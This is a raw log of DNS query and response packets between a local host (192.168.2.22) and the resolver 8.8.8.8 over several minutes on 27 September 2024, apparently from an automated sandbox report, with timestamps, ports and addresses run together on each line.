                                                                                            Sep 27, 2024 14:00:32.505213976 CEST53627518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:32.630737066 CEST5789353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:33.644702911 CEST5789353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:35.160998106 CEST53578938.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:35.615067959 CEST53627518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:35.749037981 CEST53578938.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:36.906002045 CEST53578938.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:37.930676937 CEST5482153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:38.933235884 CEST5482153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:39.947252035 CEST5482153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:41.959605932 CEST5482153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:42.142952919 CEST53548218.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:42.937685966 CEST53548218.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:44.551234007 CEST5471953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:44.558604956 CEST53547198.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:44.954437971 CEST53548218.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:46.985439062 CEST4988153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:47.464903116 CEST53548218.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:47.473181963 CEST53498818.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:49.933279037 CEST5499853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:49.943022013 CEST53549988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:52.387089014 CEST5278153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:53.394454956 CEST5278153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:53.494307041 CEST53527818.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:55.924626112 CEST6392653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:55.931344032 CEST53639268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:57.393984079 CEST53527818.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:00:58.374610901 CEST6551053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:00:58.387974977 CEST53655108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:00.822292089 CEST6267253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:00.829336882 CEST53626728.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:03.287377119 CEST5647553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:03.294471979 CEST53564758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:05.741559982 CEST4938453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:05.752479076 CEST53493848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:08.202863932 CEST5484253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:08.301836967 CEST53548428.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:10.712594986 CEST5810553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:10.719921112 CEST53581058.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:13.321367979 CEST6492853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:13.329231024 CEST53649288.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:15.829636097 CEST5739053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:15.837271929 CEST53573908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:18.345551968 CEST5809553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:18.356394053 CEST53580958.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:20.795851946 CEST5426153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:21.802154064 CEST5426153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:22.816242933 CEST5426153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:23.923219919 CEST53542618.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:23.923522949 CEST5426153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:24.917315006 CEST53542618.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:24.926367998 CEST5426153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:24.934381962 CEST53542618.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:25.803556919 CEST53542618.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:26.021008968 CEST6050753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:26.028297901 CEST53605078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:26.028477907 CEST6050753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:26.035914898 CEST53605078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:26.036076069 CEST6050753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:26.043209076 CEST53605078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:26.043359041 CEST6050753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:26.050077915 CEST53605078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:26.050223112 CEST6050753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:26.058279037 CEST53605078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:27.356870890 CEST5044653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:27.364629030 CEST53504468.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:27.364816904 CEST5044653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:27.372545004 CEST53504468.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:27.372700930 CEST5044653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:27.379765034 CEST53504468.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:27.379908085 CEST5044653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:27.387445927 CEST53504468.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:27.387646914 CEST5044653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:27.394988060 CEST53504468.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:28.412928104 CEST5593953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:28.599086046 CEST53559398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:28.599522114 CEST5593953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:28.930603981 CEST53542618.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:29.602075100 CEST5593953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:29.609155893 CEST53559398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:29.609379053 CEST5593953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:30.697485924 CEST53559398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:30.701396942 CEST5593953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:30.709381104 CEST53559398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:31.732510090 CEST4960853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:31.740211964 CEST53496088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:31.740382910 CEST4960853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:31.746661901 CEST53496088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:31.746861935 CEST4960853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:31.753889084 CEST53496088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:31.754096031 CEST4960853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:34.615731955 CEST53559398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:35.748786926 CEST4960853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:35.875736952 CEST53496088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:36.760782957 CEST53496088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:36.892534018 CEST6148653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:36.900362968 CEST53614868.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:36.900552034 CEST6148653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:36.912358046 CEST53614868.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:36.912480116 CEST6148653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:36.924940109 CEST53614868.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:36.931924105 CEST6148653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:36.942045927 CEST53614868.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:36.942250013 CEST6148653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:36.949496031 CEST53614868.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:37.969182014 CEST6245353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:37.976424932 CEST53624538.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:37.981447935 CEST6245353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:37.988940954 CEST53624538.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:37.993057013 CEST6245353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:38.001744986 CEST53624538.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:38.005044937 CEST6245353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:38.021466017 CEST53624538.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:38.025048971 CEST6245353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:38.034388065 CEST53624538.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:39.052650928 CEST5056853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:39.059739113 CEST53505688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:39.059912920 CEST5056853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:39.159255028 CEST53505688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:39.159463882 CEST5056853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:41.170875072 CEST5056853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:41.180591106 CEST53505688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:41.226677895 CEST5056853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:41.234006882 CEST53505688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:41.261784077 CEST53505688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:42.246937990 CEST6146753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:42.254195929 CEST53614678.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:42.254384041 CEST6146753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:42.261636019 CEST53614678.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:42.261765003 CEST6146753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:42.268680096 CEST53614678.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:42.268865108 CEST6146753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:42.279539108 CEST53614678.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:42.279783964 CEST6146753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:42.288510084 CEST53614678.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:43.307391882 CEST6161853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:43.314425945 CEST53616188.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:43.317064047 CEST6161853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:43.324228048 CEST53616188.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:43.325021029 CEST6161853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:45.326891899 CEST6161853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:45.334211111 CEST53616188.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:45.334369898 CEST6161853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:45.341541052 CEST53616188.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:46.347330093 CEST5442253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:46.355726957 CEST53544228.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:46.356028080 CEST5442253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:46.364470005 CEST53544228.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:46.364794016 CEST5442253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:46.372585058 CEST53544228.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:46.373334885 CEST5442253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:46.381429911 CEST53544228.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:46.381865978 CEST5442253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:48.331671000 CEST53616188.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:49.484607935 CEST53544228.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:50.503493071 CEST5207453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:50.510662079 CEST53520748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:50.510829926 CEST5207453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:50.517915010 CEST53520748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:50.518029928 CEST5207453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:50.524514914 CEST53520748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:50.547816038 CEST5207453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:50.556359053 CEST53520748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:50.557993889 CEST5207453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:50.565166950 CEST53520748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:51.587002993 CEST5033753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:51.595520973 CEST53503378.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:51.595680952 CEST5033753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:51.603665113 CEST53503378.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:51.603790045 CEST5033753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:51.612235069 CEST53503378.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:51.612366915 CEST5033753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:51.619903088 CEST53503378.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:51.620038033 CEST5033753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:56.626837969 CEST53503378.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:56.678056002 CEST6182653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:56.685030937 CEST53618268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:56.685261965 CEST6182653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:56.692166090 CEST53618268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:56.692328930 CEST6182653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:56.698729038 CEST53618268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:56.699428082 CEST6182653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:56.705701113 CEST53618268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:56.705895901 CEST6182653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:56.712663889 CEST53618268.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:57.725100994 CEST5632953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:57.732306004 CEST53563298.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:57.732467890 CEST5632953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:57.739619970 CEST53563298.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:57.739761114 CEST5632953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:57.747405052 CEST53563298.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:57.747539043 CEST5632953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:57.754637003 CEST53563298.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:57.754782915 CEST5632953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:57.761670113 CEST53563298.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:58.787954092 CEST6346953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:58.795722008 CEST53634698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:58.797257900 CEST6346953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:59.803766966 CEST6346953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:59.811031103 CEST53634698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:59.811193943 CEST6346953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:59.818664074 CEST53634698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:01:59.818821907 CEST6346953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:01:59.826071024 CEST53634698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:00.844207048 CEST5944753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:01.847588062 CEST5944753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:01.854823112 CEST53594478.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:01.855077982 CEST5944753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:01.862396955 CEST53594478.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:01.862596989 CEST5944753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:01.986066103 CEST53594478.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:01.986361027 CEST5944753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:01.993362904 CEST53594478.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:03.007808924 CEST5182853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:03.015757084 CEST53518288.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:03.015917063 CEST5182853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:03.027157068 CEST53518288.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:03.032572031 CEST5182853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:03.058372974 CEST53518288.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:03.058532953 CEST5182853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:03.069689989 CEST53518288.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:03.069828033 CEST5182853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:03.085854053 CEST53518288.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:04.033365011 CEST53634698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:04.103888988 CEST5340653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:04.264040947 CEST53534068.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:04.264270067 CEST5340653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:04.272073030 CEST53534068.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:04.272372007 CEST5340653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:04.278798103 CEST53534068.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:04.278930902 CEST5340653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:04.285340071 CEST53534068.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:04.285540104 CEST5340653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:04.293724060 CEST53534068.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:05.304923058 CEST5634553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:05.312244892 CEST53563458.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:05.312443972 CEST5634553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:05.319056034 CEST53563458.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:05.319197893 CEST5634553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:05.326452017 CEST53563458.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:05.326653957 CEST5634553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:05.334017992 CEST53563458.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:05.335335970 CEST5634553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:05.342823029 CEST53563458.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:06.360479116 CEST5187053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:06.800004005 CEST53594478.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:07.080513954 CEST53518708.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:07.080735922 CEST5187053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:07.089909077 CEST53518708.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:07.090181112 CEST5187053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:07.100590944 CEST53518708.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:07.100748062 CEST5187053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:07.108881950 CEST53518708.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:07.111489058 CEST5187053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:07.119424105 CEST53518708.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:08.144737959 CEST6500953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:09.148519039 CEST6500953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:09.155910015 CEST53650098.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:09.156084061 CEST6500953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:09.162985086 CEST53650098.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:09.163108110 CEST6500953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:10.270761013 CEST53650098.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:10.271097898 CEST6500953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:10.289028883 CEST53650098.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:11.309632063 CEST6495653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:12.315011024 CEST6495653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:12.417829037 CEST53649568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:12.418077946 CEST6495653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:12.425306082 CEST53649568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:12.425460100 CEST6495653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:12.433037043 CEST53649568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:12.433193922 CEST6495653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:12.440623999 CEST53649568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:13.154376030 CEST53650098.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:13.460370064 CEST5452153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:13.467782021 CEST53545218.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:13.467952967 CEST5452153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:13.475064993 CEST53545218.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:13.475203991 CEST5452153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:13.481853962 CEST53545218.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:13.481988907 CEST5452153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:13.489291906 CEST53545218.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:13.489409924 CEST5452153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:13.495903015 CEST53545218.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:14.512722969 CEST4975053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:14.519996881 CEST53497508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:14.520304918 CEST4975053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:14.527364969 CEST53497508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:14.527966976 CEST4975053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:14.536453009 CEST53497508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:14.541131973 CEST4975053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:14.548146009 CEST53497508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:14.553205013 CEST4975053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:14.561284065 CEST53497508.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:15.555946112 CEST53649568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:15.591377020 CEST6468753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:15.599407911 CEST53646878.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:15.603148937 CEST6468753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:15.610790014 CEST53646878.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:15.611131907 CEST6468753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:15.619100094 CEST53646878.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:15.623501062 CEST6468753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:15.631732941 CEST53646878.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:15.635258913 CEST6468753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:15.644714117 CEST53646878.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.660229921 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.668685913 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.668862104 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.676539898 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.677236080 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.690076113 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.693144083 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.700191975 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.701165915 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.712657928 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.717761993 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.726962090 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.727118015 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.733617067 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.733748913 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.740940094 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.741048098 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.748574018 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.748682976 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.755320072 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.763149023 CEST5620753192.168.2.228.8.8.8
